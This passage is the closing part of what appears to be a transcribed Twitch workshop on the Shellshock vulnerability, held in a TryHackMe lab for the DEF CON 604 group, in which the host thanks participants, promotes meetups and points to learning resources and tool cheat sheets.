some love by thumbs upping the room for 0 day. 0 day is a pretty cool dude. He's on Twitter. If you wanna, you know, if you wanna go follow him, he's kind of a, you know, rising star in the cybersecurity world. If you want to support him, that'd be great. Let's see. Let me pull up my scuffed PowerPoint again. So follow this Twitch channel. So you can follow this Twitch channel if you enjoyed the workshop. I really love running workshops for everybody. I love to see everybody getting excited about cybersecurity, and you know, I like to see that that people are, you know, like people are, you know, getting tasks done with my help. Let's see. I guess I'll take this opportunity to thank the people who followed my channel in the last little bit. So First Flush 87, thank you very much for following the channel, and HFTA Mayo, thank you very much for following the channel. Guys, so this workshop was done as part of the DEF CON 604 cybersecurity group. If you guys want to see, you know, like other events that the DEF CON 604 group is holding, you can go to the meetup page, meetup.com/defcon604, and it should bring you to the meetup page, and you can see the upcoming events on this page. For example, I just did my TryHackMe hands-on workshop, but there's a DC 604 monthly cybersecurity meetup that's happening here. There are guest speakers who are talking about all sorts of cybersecurity topics at these meetups. I usually try to attend whenever I can, but everybody, oh, CMH says I'm updating the target computer. I'm not. Are you still working on the exercise right now, CMH? But guys, if you have any other questions about the Shellshock vulnerability, or it disconnected you earlier, thanks so much, says Scott, not for Scott. Well, thank you very much, not for Scott, for showing up to participate in our little workshop tonight. Yeah, if you guys have any questions about cybersecurity or the Shellshock vulnerability, you can ask them now. Like, you know, not for Scott says I finished with 2 minutes to spare. Yeah, it's kind of a TryHackMe is really great because they give access to these virtual machines for free. to non-subscribing users. But unfortunately, you only get an hour worth of access with your free account. But yeah, it's pretty cool because you don't have to download or set up any virtual machines of your own. You can just go to the website and spin up your own. But let's see. If you guys are interested in studying more cybersecurity topics inside of the guide PDF file, let me make this a little easier. At the very end of the document, there are some links to some additional learning materials. So there are 3 links here that talk about the Shellshock vulnerability that we talked about tonight. If you guys want to learn about Linux, there are a bunch of TryHackMe rooms which are free that you can use to learn more about Linux. Computer networking. TryHackMe has some cool introductory to computer networking rooms over here as well. There's also a short appendix at the end of the document, which talks about some of the programs we used. So there's a cheat sheet for basic Linux commands over here, nmap over here, nikto here, and for curl over here. I guess that's going to be it for tonight's workshop, everybody. Thank you very much for coming by. I run a workshop like this every 2 weeks. I try to run them at the same time on Saturday every time. I'd love to see you guys come and participate again in the future. But yeah, thanks very much, DIY Trying. Really appreciate it. Says not for Scott. I appreciate you, and I appreciate that that you're going out of your way to learn about a little bit of offensive security. Yeah, I hope you had fun, and I guess I'll see you next time. Everybody, take care and have a good rest of the evening.